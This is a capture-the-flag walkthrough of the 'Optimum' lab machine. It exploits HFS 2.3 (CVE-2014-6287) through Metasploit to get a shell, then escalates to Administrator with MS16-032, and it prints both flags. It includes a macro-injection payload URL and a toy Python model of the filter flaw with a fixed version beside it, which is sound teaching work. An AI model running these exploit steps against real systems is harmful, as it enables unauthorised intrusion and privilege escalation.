
Optimum

As usual, let's start with an nmap scan of all ports, with version detection and the default scripts:

nmap -sV -sC -p- 10.129.170.240

The scan shows a single web service on port 80: HFS (HttpFileServer) 2.3. Googling "HFS 2.3 exploit" turns up CVE-2014-6287, a remote command execution bug in the search function of HFS 2.3x, and Metasploit covers it with the exploit/windows/http/rejetto_hfs_exec module.
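To see why the Metasploit module works, here is an added Python model of the flaw it exploits. This is not HFS source code and not part of the original write-up: the function names, the filter logic and the request URL are illustrative. The idea it reproduces is that HFS has a template language in which {.exec|program.} runs a program; the search parameter is supposed to be screened for macro markers before the template engine sees it, but the original check stopped at a NUL byte (%00), so a macro placed after the NUL reached the engine untouched.

```python
"""Toy model of the HFS 2.3 search-macro filter bypass (CVE-2014-6287).

Added example, not HFS code: a simplified re-creation of the bug the
rejetto_hfs_exec module abuses, with a hardened filter next to it.
"""
from urllib.parse import unquote

MACRO_OPEN = "{."           # HFS macro marker


def vulnerable_filter(search: str) -> str:
    """Mimics the broken check: only the part before the first NUL is
    inspected, but the whole string is handed on to the template engine."""
    checked = search.split("\x00", 1)[0]
    if MACRO_OPEN in checked:
        raise ValueError("macro in search term rejected")
    return search


def fixed_filter(search: str) -> str:
    """Hardened version: refuse NUL bytes outright and inspect the entire
    string, so nothing after a NUL can slip past the check."""
    if "\x00" in search:
        raise ValueError("NUL byte in search term rejected")
    if MACRO_OPEN in search:
        raise ValueError("macro in search term rejected")
    return search


def macro_engine_would_execute(template_input: str) -> bool:
    """Stand-in for the template engine: True if an exec macro is present
    anywhere in what the engine is given."""
    return "{.exec|" in template_input


def search_param_from_url(url: str) -> str:
    """Extract and percent-decode the ?search= value (keeps the %00)."""
    query = url.split("?", 1)[1] if "?" in url else ""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "search":
            return unquote(value)
    return ""


def is_exploitable(url: str, filter_fn) -> bool:
    """Push a request through a filter and report whether the macro engine
    would still see an exec macro afterwards."""
    try:
        passed = filter_fn(search_param_from_url(url))
    except ValueError:
        return False
    return macro_engine_would_execute(passed)


# Constructed request in the shape of the public PoC; not captured traffic.
POC_URL = "http://10.129.170.240/?search=%00{.exec|calc.}"
# Same macro without the NUL: the broken filter does catch this one.
NO_NUL_URL = "http://10.129.170.240/?search={.exec|calc.}"

if __name__ == "__main__":
    print("vulnerable filter, %00 payload :", is_exploitable(POC_URL, vulnerable_filter))
    print("vulnerable filter, no %00      :", is_exploitable(NO_NUL_URL, vulnerable_filter))
    print("fixed filter, %00 payload      :", is_exploitable(POC_URL, fixed_filter))
```

The point of the comparison is that the flaw is not in the macro language itself but in a check that looked at a different string than the one the engine later consumed; any filter that stops at a NUL while the consumer does not will have the same problem.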


Let's follow the steps from that article in Metasploit.


msfconsole
use exploit/windows/http/rejetto_hfs_exec

show options

set RHOSTS 10.129.170.240
set LHOST 10.10.14.21

exploit

getuid

sysinfo

shell

dir

We find a text file called user.txt.txt

Let's open using:

type user.txt.txt

d0c39409d7b994a9a1389ebf38ef5f73


Congratulations! You got the user flag!


Let's now look for the root flag

cd ..
cd ..
dir

cd Administrator

Access is denied


Return to the meterpreter shell by typing:

exit


Privilege Escalation


Let's use Lester (the local exploit suggester) from Metasploit. It checks the current session for local privilege escalation exploits the target looks vulnerable to.


To run Lester, we use:

run post/multi/recon/local_exploit_suggester

There are a couple of exploits we could use but I tried exploit/windows/local/bypassuac_eventvwr and it didn't work.


We will use exploit/windows/local/ms16_032_secondary_logon_handle_privesc (MS16-032, the Secondary Logon service handle leak).


But first let's look at the running processes. The HFS process our session lives in is 32-bit on a 64-bit Windows host, and the MS16-032 module wants a session in a native x64 process, so we want to migrate before running it:

ps

Let's migrate to explorer.exe, which here has PID 1988 (the PID will differ on your run; take it from the ps output):

migrate 1988

background

This prints the session id, which is 1 here (we will need it for the privilege escalation module).


use exploit/windows/local/ms16_032_secondary_logon_handle_privesc


show options

set SESSION 1
set LHOST 10.10.14.21

exploit


shell

cd C:\Users\Administrator\Desktop
dir
type root.txt

51ed1b36553c8461f4552c2e92b3eeed


Congratulations! You got the root flag!
